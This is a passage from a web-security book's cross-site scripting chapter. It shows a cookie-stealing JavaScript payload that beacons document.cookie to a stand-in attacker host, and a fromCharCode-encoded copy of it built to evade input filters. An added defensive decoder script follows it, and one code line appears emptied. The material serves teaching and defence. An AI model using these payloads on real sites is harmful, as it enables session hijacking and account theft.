
Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"

So the attacker will have access to the victim's account only for that limited time. Cookies can
be stolen with the following code:
var x=new Image();x.src='http://attackerssite.com/eatMoreCookies?c='
+document.cookie;
or
document.write("");
If certain characters are disallowed, convert these strings to their ASCII decimal value
and use JavaScript's String.fromCharCode() function. The following JavaScript is
equivalent to the preceding JavaScript:
eval(String.fromCharCode(118,97,114,32,120,61,110,101,119,32,73,109,
97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,
97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,
101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,
100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));
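
An input filter that matches literal strings never sees the encoded form above. The following added example (not from the book) decodes String.fromCharCode() argument lists before matching; the function names, signature list and sample string are assumptions constructed for illustration.

```javascript
// Added example: decode String.fromCharCode(...) calls before signature matching.
// Argument list: decimal or hex integers separated by commas (mandatory
// separators keep the pattern linear-time on hostile input).
const NUM = '(?:0x[0-9a-f]+|\\d+)';
const CHARCODE_CALL = new RegExp(
  'String\\s*\\.\\s*fromCharCode\\s*\\(\\s*(' + NUM + '(?:\\s*,\\s*' + NUM + ')*)\\s*\\)', 'gi');

// Assumed signature list for illustration; extend it for a real filter.
const SIGNATURES = [
  ['cookie-read', /document\s*\.\s*cookie/i],
  ['image-beacon', /new\s+Image\s*\(/i],
  ['src-assignment', /\.src\s*=/i],
];

// Replace each call with the text it would produce. Repeats to unwrap nesting.
function decodeCharCodes(input, maxPasses = 3) {
  let text = input;
  for (let pass = 0; pass < maxPasses; pass++) {
    const next = text.replace(CHARCODE_CALL, (_match, args) =>
      args.split(',').map((n) => String.fromCharCode(Number(n.trim()))).join(''));
    if (next === text) break;
    text = next;
  }
  return text;
}

// Report the decoded text, whether decoding changed it, and matched signatures.
function inspect(input) {
  const decoded = decodeCharCodes(input);
  const hits = SIGNATURES.filter(([, re]) => re.test(decoded)).map(([name]) => name);
  return { decoded, obfuscated: decoded !== input, hits };
}

// Constructed sample: the character codes spell "document.cookie".
const SAMPLE =
  'eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))';

console.log(inspect(SAMPLE));
```

The decoded text drops the string quoting the call would have produced at run time, so it is suitable for pattern matching and logging, not for re-execution.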
Chapter 2: Cross-Site Scripting 45
Phishing Attacks
An attacker can use an XSS for social engineering by mimicking the web application to
the user. Upon a successful XSS, the attacker has complete control over how the web
application looks. This can be used for web defacement, where an attacker puts up a silly
picture, for example.

